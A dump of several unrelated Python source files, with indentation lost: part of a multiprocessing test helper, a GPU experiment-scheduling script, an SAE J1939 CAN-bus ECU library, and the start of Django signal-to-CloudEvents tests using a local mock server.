Pipe = staticmethod(multiprocessing.dummy.Pipe)
Queue = staticmethod(multiprocessing.dummy.Queue)
JoinableQueue = staticmethod(multiprocessing.dummy.JoinableQueue)
Lock = staticmethod(multiprocessing.dummy.Lock)
RLock = staticmethod(multiprocessing.dummy.RLock)
Semaphore = staticmethod(multiprocessing.dummy.Semaphore)
BoundedSemaphore = staticmethod(multiprocessing.dummy.BoundedSemaphore)
Condition = staticmethod(multiprocessing.dummy.Condition)
Event = staticmethod(multiprocessing.dummy.Event)
Barrier = staticmethod(multiprocessing.dummy.Barrier)
Value = staticmethod(multiprocessing.dummy.Value)
Array = staticmethod(multiprocessing.dummy.Array)
#
# Functions used to create test cases from the base ones in this module
#
def install_tests_in_module_dict(remote_globs, start_method):
__module__ = remote_globs['__name__']
local_globs = globals()
ALL_TYPES = {'processes', 'threads', 'manager'}
for name, base in local_globs.items():
if not isinstance(base, type):
continue
if issubclass(base, BaseTestCase):
if base is BaseTestCase:
continue
assert set(base.ALLOWED_TYPES) <= ALL_TYPES, base.ALLOWED_TYPES
for type_ in base.ALLOWED_TYPES:
newname = 'With' + type_.capitalize() + name[1:]
Mixin = local_globs[type_.capitalize() + 'Mixin']
class Temp(base, Mixin, unittest.TestCase):
pass
Temp.__name__ = Temp.__qualname__ = newname
Temp.__module__ = __module__
remote_globs[newname] = Temp
elif issubclass(base, unittest.TestCase):
class Temp(base, object):
pass
Temp.__name__ = Temp.__qualname__ = name
Temp.__module__ = __module__
remote_globs[name] = Temp
dangling = [None, None]
old_start_method = [None]
def setUpModule():
multiprocessing.set_forkserver_preload(PRELOAD)
multiprocessing.process._cleanup()
dangling[0] = multiprocessing.process._dangling.copy()
dangling[1] = threading._dangling.copy()
old_start_method[0] = multiprocessing.get_start_method(allow_none=True)
try:
multiprocessing.set_start_method(start_method, force=True)
except ValueError:
raise unittest.SkipTest(start_method +
' start method not supported')
if sys.platform.startswith("linux"):
try:
lock = multiprocessing.RLock()
except OSError:
raise unittest.SkipTest("OSError raises on RLock creation, "
"see issue 3111!")
check_enough_semaphores()
util.get_temp_dir() # creates temp directory
multiprocessing.get_logger().setLevel(LOG_LEVEL)
def tearDownModule():
multiprocessing.set_start_method(old_start_method[0], force=True)
# pause a bit so we don't get warning about dangling threads/processes
time.sleep(0.5)
multiprocessing.process._cleanup()
gc.collect()
tmp = set(multiprocessing.process._dangling) - set(dangling[0])
if tmp:
print('Dangling processes:', tmp, file=sys.stderr)
del tmp
tmp = set(threading._dangling) - set(dangling[1])
if tmp:
print('Dangling threads:', tmp, file=sys.stderr)
remote_globs['setUpModule'] = setUpModule
remote_globs['tearDownModule'] = tearDownModule
|
run_folder.py
|
import multiprocessing
import os, sys
import numpy as np
import runner
import time
def main(folder_path: str, gpus: str, parallel_runs=3, num_reruns=3):
gpus = gpus.strip().split(',' if ',' in gpus else ';')
parallel_runs = int(parallel_runs)
num_reruns = int(num_reruns)
assert parallel_runs % len(gpus) == 0, f'Num parallel runs {parallel_runs} must be multiple of num gpus {len(gpus)}'
if os.path.isfile(os.path.join(folder_path, 'schedule')):
d = {}
with open(os.path.join(folder_path, 'schedule'), 'r') as f:
for l in f.read().splitlines():
if l.split(':')[0] in d.keys():
d[l.split(':')[0]].append(l.split(':')[1])
else:
d[l.split(':')[0]] = [l.split(':')[1]]
configs = {int(k): np.array(v) for k, v in d.items() if k.isnumeric()}
else:
configs = sorted([os.path.join(folder_path, f) for f in os.listdir(folder_path) if '.json' in f])
print(f'Found {len(configs)} configs:')
for c in configs: print(f'\t{c}')
print('')
# Order num_reruns times configs for processing
configs = np.array(configs * num_reruns)
configs = np.array_split(configs, parallel_runs)
configs = {process_nr: c_list for process_nr, c_list in enumerate(configs)}
with open(os.path.join(folder_path, 'schedule'), 'w') as f:
for process_nr, c_list in configs.items():
for c in c_list:
f.write(f'{process_nr}:{c}\n')
process_list = []
for process_nr, c_list in configs.items():
p = multiprocessing.Process(target=run_process, args=(c_list, gpus[process_nr % len(gpus)], process_nr))
p.daemon = True
p.start()
process_list.append(p)
# Wait 5s before next process is started so there is no interference
time.sleep(5)
for p in process_list:
p.join()
print('Finished')
def run_process(c_list: list, gpu_nr: str, process_nr=0):
print(f'[{process_nr}: {time.strftime("%a, %d %b %Y %H:%M:%S", time.localtime())}]\tStarting process nr. {process_nr} with {len(c_list)} total runs')
t_list = []
t = time.time()
for i, conf in enumerate(c_list):
# Mark processing in schedule
write_file(os.path.join(*os.path.split(conf)[:-1]), f'{process_nr}', conf, 'p')
with HiddenPrints():
runner.main(config=conf, name='', ti_option='', gpu=gpu_nr, use_mp=None, num_workers=None)
t_list.append(time.time() - t)
t = time.time()
eta = np.array(t_list).mean() * (len(c_list) - (i + 1)) + t
eta = ')' if (len(c_list) - (i + 1)) == 0 else f' -> ETA: {time.strftime("%a, %d %b %Y %H:%M:%S", time.localtime(eta))})'
print(f'[{process_nr}: {time.strftime("%a, %d %b %Y %H:%M:%S", time.localtime())}] Finished run {i + 1}/{len(c_list)} [{(i + 1)/len(c_list)*100:.2f}%] '
f'({pretty_time(t_list[-1])}{eta}')
# Mark finished in schedule
write_file(os.path.join(*os.path.split(conf)[:-1]), f'{process_nr}p', conf, 'f')
def write_file(path, queryf, queryb, mark):
done = False
while not done:
if not os.path.isfile(os.path.join(path, 'temp')):
# Create temp file
with open(os.path.join(path, 'temp'), 'w'): pass
# Write new schedule
with open(os.path.join(path, 'schedule'), 'r') as f:
t = f.read().splitlines()
with open(os.path.join(path, 'schedule'), 'w') as f:
f.truncate()
found = False
for i, c in enumerate(t):
if c.split(':')[0] == str(queryf) and c.split(':')[1] == str(queryb) and not found:
f.write(f'{queryf}{mark}:{queryb}\n')
found = True
else:
f.write(c + '\n')
# Remove temp file
os.remove(os.path.join(path, 'temp'))
done = True
else:
time.sleep(1)
def pretty_time(secs):
ints = [86400, 3600, 60, 1]
# Find largest non-zero element
start_ = [i for i in range(4) if secs > ints[i]][0]
divs = [int(((secs % ints[i - 1]) if i > 0 else secs) / ints[i]) for i in range(4)]
divs = [f'{a}{b}' for a, b in zip(divs, 'dhms')]
return ' '.join(divs[start_:])
class HiddenPrints:
def __enter__(self):
self._original_stdout = sys.stdout
sys.stdout = open(os.devnull, 'w')
self._original_stderr = sys.stderr
sys.stderr = sys.stdout
def __exit__(self, exc_type, exc_val, exc_tb):
sys.stdout.close()
sys.stdout = self._original_stdout
sys.stderr = self._original_stderr
if __name__ == '__main__':
main(*sys.argv[1:])
|
electronic_control_unit.py
|
import logging
import can
from can import Listener
import time
import threading
try:
# Python27
import Queue as queue
except ImportError:
# Python35
import queue
import j1939
logger = logging.getLogger(__name__)
class ElectronicControlUnit(object):
"""ElectronicControlUnit (ECU) holding one or more ControllerApplications (CAs)."""
class ConnectionMode(object):
RTS = 16
CTS = 17
EOM_ACK = 19
BAM = 32
ABORT = 255
class ConnectionAbortReason(object):
BUSY = 1 # Already in one or more connection managed sessions and cannot support another
RESOURCES = 2 # System resources were needed for another task so this connection managed session was terminated
TIMEOUT = 3 # A timeout occured
# 4..250 Reserved by SAE
CTS_WHILE_DT = 4 # according AUTOSAR: CTS messages received when data transfer is in progress
# 251..255 Per J1939/71 definitions - but there are none?
class Timeout(object):
"""Timeouts according SAE J1939/21"""
Tr = 0.200 # Response Time
Th = 0.500 # Holding Time
T1 = 0.750
T2 = 1.250
T3 = 1.250
T4 = 1.050
# timeout for multi packet broadcast messages 50..200ms
Tb = 0.050
class SendBufferState(object):
WAITING_CTS = 0 # waiting for CTS
SENDING_IN_CTS = 1 # sending packages (temporary state)
SENDING_BM = 2 # sending broadcast packages
def __init__(self, bus=None):
"""
:param can.BusABC bus:
A python-can bus instance to re-use.
"""
#: A python-can :class:`can.BusABC` instance
self._bus = bus
# Locking object for send
self._send_lock = threading.Lock()
#: Includes at least MessageListener.
self._listeners = [MessageListener(self)]
self._notifier = None
self._subscribers = []
# List of ControllerApplication
self._cas = []
# Receive buffers
self._rcv_buffer = {}
# Send buffers
self._snd_buffer = {}
# List of timer events the job thread should care of
self._timer_events = []
self._job_thread_end = threading.Event()
logger.info("Starting ECU async thread")
self._job_thread_wakeup_queue = queue.Queue()
self._job_thread = threading.Thread(target=self._async_job_thread, name='j1939.ecu job_thread')
# A thread can be flagged as a "daemon thread". The significance of
# this flag is that the entire Python program exits when only daemon
# threads are left.
self._job_thread.daemon = True
self._job_thread.start()
# TODO: do we have to stop the tread somehow?
def _async_job_thread(self):
"""Asynchronous thread for handling various jobs
This Thread handles various tasks:
- Event trigger for associated CAs
- Timeout monitoring of communication objects
To construct a blocking wait with timeout the task waits on a
queue-object. When other tasks are adding timer-events they can
wakeup the timeout handler to recalculate the new sleep-time
to awake at the new events.
"""
while not self._job_thread_end.isSet():
now = time.time()
next_wakeup = time.time() + 5.0 # wakeup in 5 seconds
# check receive buffers for timeout
# using "list(x)" to prevent "RuntimeError: dictionary changed size during iteration"
for bufid in list(self._rcv_buffer):
buf = self._rcv_buffer[bufid]
if buf['deadline'] != 0:
if buf['deadline'] > now:
if next_wakeup > buf['deadline']:
next_wakeup = buf['deadline']
else:
# deadline reached
logger.info("Deadline reached for rcv_buffer src 0x%02X dst 0x%02X", buf['src_address'], buf['dest_address'] )
if buf['dest_address'] != j1939.ParameterGroupNumber.Address.GLOBAL:
# TODO: should we handle retries?
self.send_tp_abort(buf['dest_address'], buf['src_address'], ElectronicControlUnit.ConnectionAbortReason.TIMEOUT, buf['pgn'])
# TODO: should we notify our CAs about the cancelled transfer?
del self._rcv_buffer[bufid]
# check send buffers
# using "list(x)" to prevent "RuntimeError: dictionary changed size during iteration"
for bufid in list(self._snd_buffer):
buf = self._snd_buffer[bufid]
if buf['deadline'] != 0:
if buf['deadline'] > now:
if next_wakeup > buf['deadline']:
next_wakeup = buf['deadline']
else:
# deadline reached
if buf['state'] == ElectronicControlUnit.SendBufferState.WAITING_CTS:
logger.info("Deadline WAITING_CTS reached for snd_buffer src 0x%02X dst 0x%02X", buf['src_address'], buf['dest_address'] )
self.send_tp_abort(buf['src_address'], buf['dest_address'], ElectronicControlUnit.ConnectionAbortReason.TIMEOUT, buf['pgn'])
# TODO: should we notify our CAs about the cancelled transfer?
del self._snd_buffer[bufid]
elif buf['state'] == ElectronicControlUnit.SendBufferState.SENDING_IN_CTS:
# do not care about deadlines while sending (from within other function)
# TODO: maybe we can implement an asynchronous send queue here?
pass
elif buf['state'] == ElectronicControlUnit.SendBufferState.SENDING_BM:
# send next broadcast message...
offset = buf['next_packet_to_send'] * 7
data = buf['data'][offset:]
if len(data)>7:
data = data[:7]
else:
while len(data)<7:
data.append(255)
data.insert(0, buf['next_packet_to_send']+1)
self.send_tp_dt(buf['src_address'], buf['dest_address'], data)
buf['next_packet_to_send'] += 1
if buf['next_packet_to_send'] < buf['num_packages']:
buf['deadline'] = time.time() + ElectronicControlUnit.Timeout.Tb
# recalc next wakeup
if next_wakeup > buf['deadline']:
next_wakeup = buf['deadline']
else:
# done
del self._snd_buffer[bufid]
else:
logger.critical("unknown SendBufferState %d", buf['state'])
del self._snd_buffer[bufid]
# check timer events
for event in self._timer_events:
if event['deadline'] > now:
if next_wakeup > event['deadline']:
next_wakeup = event['deadline']
else:
# deadline reached
logger.debug("Deadline for event reached")
if event['callback']( event['cookie'] ) == True:
# "true" means the callback wants to be called again
while event['deadline'] < now:
# just to take care of overruns
event['deadline'] += event['delta_time']
# recalc next wakeup
if next_wakeup > event['deadline']:
next_wakeup = event['deadline']
else:
# remove from list
self._timer_events.remove( event )
time_to_sleep = next_wakeup - time.time()
if time_to_sleep > 0:
try:
self._job_thread_wakeup_queue.get(True, time_to_sleep)
except queue.Empty:
# do nothing
pass
def stop(self):
"""Stops the ECU background handling
This Function explicitely stops the background handling of the ECU.
"""
self._job_thread_end.set()
self._job_thread_wakeup()
self._job_thread.join()
def _job_thread_wakeup(self):
"""Wakeup the async job thread
By calling this function we wakeup the asyncronous job thread to
force a recalculation of his next wakeup event.
"""
self._job_thread_wakeup_queue.put(1)
def add_timer(self, delta_time, callback, cookie=None):
"""Adds a callback to the list of timer events
:param delta_time:
The time in seconds after which the event is to be triggered.
:param callback:
The callback function to call
"""
d = {
'delta_time': delta_time,
'callback': callback,
'deadline': (time.time() + delta_time),
'cookie': cookie,
}
self._timer_events.append( d )
self._job_thread_wakeup()
def remove_timer(self, callback):
"""Removes ALL entries from the timer event list for the given callback
:param callback:
The callback to be removed from the timer event list
"""
for event in self._timer_events:
if event['callback'] == callback:
self._timer_events.remove( event )
self._job_thread_wakeup()
def connect(self, *args, **kwargs):
"""Connect to CAN bus using python-can.
Arguments are passed directly to :class:`can.BusABC`. Typically these
may include:
:param channel:
Backend specific channel for the CAN interface.
:param str bustype:
Name of the interface. See
`python-can manual <https://python-can.readthedocs.io/en/latest/configuration.html#interface-names>`__
for full list of supported interfaces.
:param int bitrate:
Bitrate in bit/s.
:raises can.CanError:
When connection fails.
"""
self._bus = can.interface.Bus(*args, **kwargs)
logger.info("Connected to '%s'", self._bus.channel_info)
self._notifier = can.Notifier(self._bus, self._listeners, 1)
def disconnect(self):
"""Disconnect from the CAN bus.
Must be overridden in a subclass if a custom interface is used.
"""
self._notifier.stop()
self._bus.shutdown()
self._bus = None
def subscribe(self, callback):
"""Add the given callback to the message notification stream.
:param callback:
Function to call when message is received.
"""
self._subscribers.append(callback)
def unsubscribe(self, callback):
"""Stop listening for message.
:param callback:
Function to call when message is received.
"""
self._subscribers.remove(callback)
def _buffer_hash(self, src_address, dest_address):
"""Calcluates a hash value for the given address pair
:param src_address:
The Source-Address the connection should bound to.
:param dest_address:
The Destination-Address the connection should bound to.
:return:
The calculated hash value.
:rtype: int
"""
return ((src_address & 0xFF) << 8) | (dest_address & 0xFF)
def _process_tp_cm(self, mid, dest_address, data, timestamp):
"""Processes a Transport Protocol Connection Management (TP.CM) message
:param j1939.MessageId mid:
A MessageId object holding the information extracted from the can_id.
:param int dest_address:
The destination address of the message
:param bytearray data:
The data contained in the can-message.
:param float timestamp:
The timestamp the message was received (mostly) in fractions of Epoch-Seconds.
"""
control_byte = data[0]
pgn = data[5] | (data[6] << 8) | (data[7] << 16)
src_address = mid.source_address
if control_byte == ElectronicControlUnit.ConnectionMode.RTS:
message_size = data[1] | (data[2] << 8)
num_packages = data[3]
buffer_hash = self._buffer_hash(src_address, dest_address)
if buffer_hash in self._rcv_buffer:
# according SAE J1939-21 we have to send an ABORT if an active
# transmission is already established
self.send_tp_abort(dest_address, src_address, ElectronicControlUnit.ConnectionAbortReason.BUSY, pgn)
return
# open new buffer for this connection
self._rcv_buffer[buffer_hash] = {
"pgn": pgn,
"message_size": message_size,
"num_packages": num_packages,
"next_packet": 1,
"data": [],
"deadline": time.time() + ElectronicControlUnit.Timeout.T2,
'src_address' : src_address,
'dest_address' : dest_address,
}
self.send_tp_cts(dest_address, src_address, 1, 1, pgn)
self._job_thread_wakeup()
elif control_byte == ElectronicControlUnit.ConnectionMode.CTS:
num_packages = data[1]
next_package_number = data[2] - 1
buffer_hash = self._buffer_hash(dest_address, src_address)
if buffer_hash not in self._snd_buffer:
self.send_tp_abort(dest_address, src_address, ElectronicControlUnit.ConnectionAbortReason.RESOURCES, pgn)
return
if num_packages == 0:
# SAE J1939/21
# receiver requests a pause
self._snd_buffer[buffer_hash]['deadline'] = time.time() + ElectronicControlUnit.Timeout.Th
self._job_thread_wakeup()
return
self._snd_buffer[buffer_hash]['deadline'] = time.time() + 10.0 # do not monitor deadlines while sending
self._snd_buffer[buffer_hash]['state'] = ElectronicControlUnit.SendBufferState.SENDING_IN_CTS
self._job_thread_wakeup()
# TODO: should we send the answer packets asynchronously
# maybe in our _job_thread?
for package in range(next_package_number, next_package_number + num_packages):
offset = package * 7
data = self._snd_buffer[buffer_hash]['data'][offset:]
if len(data)>7:
data = data[:7]
else:
while len(data)<7:
data.append(255)
data.insert(0, package+1)
self.send_tp_dt(dest_address, src_address, data)
self._snd_buffer[buffer_hash]['deadline'] = time.time() + ElectronicControlUnit.Timeout.T3
self._snd_buffer[buffer_hash]['state'] = ElectronicControlUnit.SendBufferState.WAITING_CTS
self._job_thread_wakeup()
elif control_byte == ElectronicControlUnit.ConnectionMode.EOM_ACK:
buffer_hash = self._buffer_hash(dest_address, src_address)
if buffer_hash not in self._snd_buffer:
self.send_tp_abort(dest_address, src_address, ElectronicControlUnit.ConnectionAbortReason.RESOURCES, pgn)
return
# TODO: should we inform the application about the successful transmission?
del self._snd_buffer[buffer_hash]
self._job_thread_wakeup()
elif control_byte == ElectronicControlUnit.ConnectionMode.BAM:
message_size = data[1] | (data[2] << 8)
num_packages = data[3]
buffer_hash = self._buffer_hash(src_address, dest_address)
if buffer_hash in self._rcv_buffer:
# TODO: should we deliver the partly received message to our CAs?
del self._rcv_buffer[buffer_hash]
self._job_thread_wakeup()
# init new buffer for this connection
self._rcv_buffer[buffer_hash] = {
"pgn": pgn,
"message_size": message_size,
"num_packages": num_packages,
"next_packet": 1,
"data": [],
"deadline": timestamp + ElectronicControlUnit.Timeout.T1,
'src_address' : src_address,
'dest_address' : dest_address,
}
self._job_thread_wakeup()
elif control_byte == ElectronicControlUnit.ConnectionMode.ABORT:
# TODO
pass
else:
raise RuntimeError("Received TP.CM with unknown control_byte %d", control_byte)
def _process_tp_dt(self, mid, dest_address, data, timestamp):
sequence_number = data[0]
src_address = mid.source_address
buffer_hash = self._buffer_hash(src_address, dest_address)
if buffer_hash not in self._rcv_buffer:
# TODO: LOG/TRACE/EXCEPTION?
return
if sequence_number != self._rcv_buffer[buffer_hash]['next_packet']:
if dest_address == j1939.ParameterGroupNumber.Address.GLOBAL:
# TODO:
return
self.send_tp_cts(dest_address, src_address, 1, self._rcv_buffer[buffer_hash]['next_packet'], self._rcv_buffer[buffer_hash]['pgn'])
self._rcv_buffer[buffer_hash]['deadline'] = time.time() + ElectronicControlUnit.Timeout.T2
self._job_thread_wakeup()
return
self._rcv_buffer[buffer_hash]['next_packet'] += 1
self._rcv_buffer[buffer_hash]['deadline'] = time.time() + ElectronicControlUnit.Timeout.T1
self._job_thread_wakeup()
self._rcv_buffer[buffer_hash]['data'].extend(data[1:])
# TODO: should we check the number of received messages instead?
if len(self._rcv_buffer[buffer_hash]['data']) >= self._rcv_buffer[buffer_hash]['message_size']:
logger.info("finished RCV of PGN {} with size {}".format(self._rcv_buffer[buffer_hash]['pgn'], self._rcv_buffer[buffer_hash]['message_size']))
# shorten data to message_size
self._rcv_buffer[buffer_hash]['data'] = self._rcv_buffer[buffer_hash]['data'][:self._rcv_buffer[buffer_hash]['message_size']]
# finished reassembly
if dest_address != j1939.ParameterGroupNumber.Address.GLOBAL:
self.send_tp_eom_ack(dest_address, src_address, self._rcv_buffer[buffer_hash]['message_size'], self._rcv_buffer[buffer_hash]['num_packages'], self._rcv_buffer[buffer_hash]['pgn'])
self.notify_subscribers(mid.priority, self._rcv_buffer[buffer_hash]['pgn'], src_address, timestamp, self._rcv_buffer[buffer_hash]['data'])
del self._rcv_buffer[buffer_hash]
self._job_thread_wakeup()
return
if dest_address != j1939.ParameterGroupNumber.Address.GLOBAL:
self.send_tp_cts(dest_address, src_address, 1, self._rcv_buffer[buffer_hash]['next_packet'], self._rcv_buffer[buffer_hash]['pgn'])
self._rcv_buffer[buffer_hash]['deadline'] = time.time() + ElectronicControlUnit.Timeout.T2
self._job_thread_wakeup()
def notify(self, can_id, data, timestamp):
"""Feed incoming CAN message into this ecu.
If a custom interface is used, this function must be called for each
29-bit standard message read from the CAN bus.
:param int can_id:
CAN-ID of the message (always 29-bit)
:param bytearray data:
Data part of the message (0 - 8 bytes)
:param float timestamp:
The timestamp field in a CAN message is a floating point number
representing when the message was received since the epoch in
seconds.
Where possible this will be timestamped in hardware.
"""
mid = j1939.MessageId(can_id=can_id)
pgn = j1939.ParameterGroupNumber()
pgn.from_message_id(mid)
if pgn.is_pdu2_format:
# direct broadcast
self.notify_subscribers(mid.priority, pgn.value, mid.source_address, timestamp, data)
return
# peer to peer
# pdu_specific is destination Address
pgn_value = pgn.value & 0x1FF00
dest_address = pgn.pdu_specific # may be Address.GLOBAL
# TODO: iterate all CAs to check if we have to handle this destination address!
if dest_address != j1939.ParameterGroupNumber.Address.GLOBAL:
reject = True
for ca in self._cas:
if ca.message_acceptable(dest_address):
reject = False
break
if reject == True:
return
if pgn_value == j1939.ParameterGroupNumber.PGN.ADDRESSCLAIM:
for ca in self._cas:
ca._process_addressclaim(mid, data, timestamp)
elif pgn_value == j1939.ParameterGroupNumber.PGN.REQUEST:
for ca in self._cas:
if ca.message_acceptable(dest_address):
ca._process_request(mid, dest_address, data, timestamp)
elif pgn_value == j1939.ParameterGroupNumber.PGN.TP_CM:
self._process_tp_cm(mid, dest_address, data, timestamp)
elif pgn_value == j1939.ParameterGroupNumber.PGN.DATATRANSFER:
self._process_tp_dt(mid, dest_address, data, timestamp)
else:
self.notify_subscribers(mid.priority, pgn_value, mid.source_address, timestamp, data)
return
def notify_subscribers(self, priority, pgn, sa, timestamp, data):
"""Feed incoming message to subscribers.
:param int priority:
Priority of the message
:param int pgn:
Parameter Group Number of the message
:param int sa:
Source Address of the message
:param int timestamp:
Timestamp of the CAN message
:param bytearray data:
Data of the PDU
"""
logger.debug("notify subscribers for PGN {}".format(pgn))
# TODO: we have to filter the dest_address here!
for callback in self._subscribers:
callback(priority, pgn, sa, timestamp, data)
def add_ca(self, **kwargs):
"""Add a ControllerApplication to the ECU.
:param controller_application:
A :class:`j1939.ControllerApplication` object.
:param name:
A :class:`j1939.Name` object.
:param device_address:
An integer representing the device address to announce to the bus.
:return:
The CA object that was added.
:rtype: r3964.ControllerApplication
"""
if 'controller_application' in kwargs:
ca = kwargs['controller_application']
else:
if 'name' not in kwargs:
raise ValueError("either 'controller_application' or 'name' must be provided")
name = kwargs.get('name')
da = kwargs.get('device_address', None)
ca = j1939.ControllerApplication(name, da)
self._cas.append(ca)
ca.associate_ecu(self)
return ca
class Acknowledgement(object):
ACK = 0
NACK = 1
AccessDenied = 2
CannotRespond = 3
def send_message(self, can_id, data):
"""Send a raw CAN message to the bus.
This method may be overridden in a subclass if you need to integrate
this library with a custom backend.
It is safe to call this from multiple threads.
:param int can_id:
CAN-ID of the message (always 29-bit)
:param data:
Data to be transmitted (anything that can be converted to bytes)
:raises can.CanError:
When the message fails to be transmitted
"""
if not self._bus:
raise RuntimeError("Not connected to CAN bus")
msg = can.Message(extended_id=True,
arbitration_id=can_id,
data=data
)
with self._send_lock:
self._bus.send(msg)
# TODO: check error receivement
def send_tp_dt(self, src_address, dest_address, data):
pgn = j1939.ParameterGroupNumber(0, 235, dest_address)
mid = j1939.MessageId(priority=7, parameter_group_number=pgn.value, source_address=src_address)
self.send_message(mid.can_id, data)
def send_tp_abort(self, src_address, dest_address, reason, pgn_value):
pgn = j1939.ParameterGroupNumber(0, 236, dest_address)
mid = j1939.MessageId(priority=7, parameter_group_number=pgn.value, source_address=src_address)
data = [ElectronicControlUnit.ConnectionMode.ABORT, reason, 0xFF, 0xFF, 0xFF, pgn_value & 0xFF, (pgn_value >> 8) & 0xFF, (pgn_value >> 16) & 0xFF]
self.send_message(mid.can_id, data)
def send_tp_cts(self, src_address, dest_address, num_packets, next_packet, pgn_value):
pgn = j1939.ParameterGroupNumber(0, 236, dest_address)
mid = j1939.MessageId(priority=7, parameter_group_number=pgn.value, source_address=src_address)
data = [ElectronicControlUnit.ConnectionMode.CTS, num_packets, next_packet, 0xFF, 0xFF, pgn_value & 0xFF, (pgn_value >> 8) & 0xFF, (pgn_value >> 16) & 0xFF]
self.send_message(mid.can_id, data)
def send_tp_eom_ack(self, src_address, dest_address, message_size, num_packets, pgn_value):
pgn = j1939.ParameterGroupNumber(0, 236, dest_address)
mid = j1939.MessageId(priority=7, parameter_group_number=pgn.value, source_address=src_address)
data = [ElectronicControlUnit.ConnectionMode.EOM_ACK, message_size & 0xFF, (message_size >> 8) & 0xFF, num_packets, 0xFF, pgn_value & 0xFF, (pgn_value >> 8) & 0xFF, (pgn_value >> 16) & 0xFF]
self.send_message(mid.can_id, data)
def send_tp_rts(self, src_address, dest_address, priority, pgn_value, message_size, num_packets):
pgn = j1939.ParameterGroupNumber(0, 236, dest_address)
mid = j1939.MessageId(priority=priority, parameter_group_number=pgn.value, source_address=src_address)
data = [ElectronicControlUnit.ConnectionMode.RTS, message_size & 0xFF, (message_size >> 8) & 0xFF, num_packets, 0xFF, pgn_value & 0xFF, (pgn_value >> 8) & 0xFF, (pgn_value >> 16) & 0xFF]
self.send_message(mid.can_id, data)
def send_acknowledgement(self, control_byte, group_function_value, address_acknowledged, pgn):
data = [control_byte, group_function_value, 0xFF, 0xFF, address_acknowledged, (pgn & 0xFF), ((pgn >> 8) & 0xFF), ((pgn >> 16) & 0xFF)]
mid = j1939.MessageId(priority=6, parameter_group_number=0x00E800, source_address=255)
self.send_message(mid.can_id, data)
def send_tp_bam(self, src_address, priority, pgn_value, message_size, num_packets):
pgn = j1939.ParameterGroupNumber(0, 236, j1939.ParameterGroupNumber.Address.GLOBAL)
mid = j1939.MessageId(priority=priority, parameter_group_number=pgn.value, source_address=src_address)
data = [ElectronicControlUnit.ConnectionMode.BAM, message_size & 0xFF, (message_size >> 8) & 0xFF, num_packets, 0xFF, pgn_value & 0xFF, (pgn_value >> 8) & 0xFF, (pgn_value >> 16) & 0xFF]
self.send_message(mid.can_id, data)
def send_pgn(self, data_page, pdu_format, pdu_specific, priority, src_address, data):
pgn = j1939.ParameterGroupNumber(data_page, pdu_format, pdu_specific)
if len(data) <= 8:
# send normal message
mid = j1939.MessageId(priority=priority, parameter_group_number=pgn.value, source_address=src_address)
self.send_message(mid.can_id, data)
else:
# init sequence
buffer_hash = self._buffer_hash(src_address, pdu_specific)
if buffer_hash in self._snd_buffer:
# There is already a sequence active for this pair
return False
message_size = len(data)
num_packets = int(message_size / 7) if (message_size % 7 == 0) else int(message_size / 7) + 1
if pdu_specific == j1939.ParameterGroupNumber.Address.GLOBAL:
# send BAM
self.send_tp_bam(src_address, priority, pgn.value, message_size, num_packets)
# init new buffer for this connection
self._snd_buffer[buffer_hash] = {
"pgn": pgn.value,
"priority": priority,
"message_size": message_size,
"num_packages": num_packets,
"data": data,
"state": ElectronicControlUnit.SendBufferState.SENDING_BM,
"deadline": time.time() + ElectronicControlUnit.Timeout.Tb,
'src_address' : src_address,
'dest_address' : pdu_specific,
'next_packet_to_send' : 0,
}
else:
# send RTS/CTS
# init new buffer for this connection
self._snd_buffer[buffer_hash] = {
"pgn": pgn.value,
"priority": priority,
"message_size": message_size,
"num_packages": num_packets,
"data": data,
"state": ElectronicControlUnit.SendBufferState.WAITING_CTS,
"deadline": time.time() + ElectronicControlUnit.Timeout.T3,
'src_address' : src_address,
'dest_address' : pdu_specific,
}
self.send_tp_rts(src_address, pdu_specific, priority, pgn.value, message_size, num_packets)
self._job_thread_wakeup()
return True
class MessageListener(Listener):
"""Listens for messages on CAN bus and feeds them to an ECU instance.
:param j1939.ElectronicControlUnit ecu:
The ECU to notify on new messages.
"""
def __init__(self, ecu):
self.ecu = ecu
def on_message_received(self, msg):
if msg.is_error_frame or msg.is_remote_frame:
return
try:
self.ecu.notify(msg.arbitration_id, msg.data, msg.timestamp)
except Exception as e:
# Exceptions in any callbaks should not affect CAN processing
logger.error(str(e))
|
tests.py
|
import io
import json
from django.db.models.signals import *
from django.test import TestCase, override_settings
from django_signals_cloudevents import send_cloudevent, default_handler
import os
from django_fake_model import models as f
from django.db import models
from http.server import BaseHTTPRequestHandler, HTTPServer
import socket
from threading import Thread
import requests
from cloudevents.sdk import marshaller
from cloudevents.sdk.converters import binary
from cloudevents.sdk.event import v1
ALLOWED_EVENT_TYPES = (
"django.orm.pre_init",
"django.orm.post_init",
"django.orm.pre_save",
"django.orm.post_save",
"django.orm.m2m_change",
"django.orm.pre_delete",
"django.orm.post_delete",
"django.orm.pre_migrate",
"django.orm.post_migrate",
)
class FakeSourceModel(f.FakeModel):
name = models.CharField(max_length=100)
enabled = models.BooleanField()
class MockServerRequestHandler(BaseHTTPRequestHandler):
def do_GET(self):
# Process an HTTP GET request and return a response with an HTTP 200 status.
self.send_response(requests.codes.ok)
self.end_headers()
return
def do_POST(self):
# Process an HTTP POST request and return a response with an HTTP 200 status.
content_len = int(self.headers.get('Content-Length'))
request_body = self.rfile.read(content_len)
m = marshaller.NewHTTPMarshaller([binary.NewBinaryHTTPCloudEventConverter()])
event = m.FromRequest(v1.Event(), self.headers, io.BytesIO(request_body), lambda x: json.load(x))
event_type = event.EventType()
assert event_type in ALLOWED_EVENT_TYPES
extensions = event.Extensions()
extensions["djangoapp"] = FakeSourceModel._meta.app_label
extensions["djangomodel"] = FakeSourceModel._meta.model_name
event_data = event.Data()
if event_type in ("django.orm.post.init", "django.orm.pre.save", "django.orm.post.save",
"django.orm.pre.delete", "django.orm.post.delete", "django.orm.m2m.change"):
assert "data" in event_data
instance_data = event_data["data"]
assert "id" in instance_data and "name" in instance_data and "enabled" in instance_data
assert event_data["db_table"] == FakeSourceModel._meta.db_table
assert event_data["test_env"] # check callback execution
check_expected_kwargs(event_type, event_data["signal_kwargs"])
self.send_response(requests.codes.ok)
self.end_headers()
return
def check_expected_kwargs(event_type, kwargs):
if event_type == "django.orm.pre_init":
assert len(kwargs) == 2 and all(k in kwargs for k in ("args", "kwargs"))
elif event_type == "django.orm.post_init":
assert len(kwargs) == 0
elif event_type == "django.orm.pre_save":
assert len(kwargs) == 3 and all(k in kwargs for k in ("update_fields", "raw", "using"))
elif event_type == "django.orm.post_save":
assert len(kwargs) == 4 and all(k in kwargs for k in ("created", "update_fields", "raw", "using"))
elif event_type in ("django.orm.pre_delete", "django.orm.post_delete"):
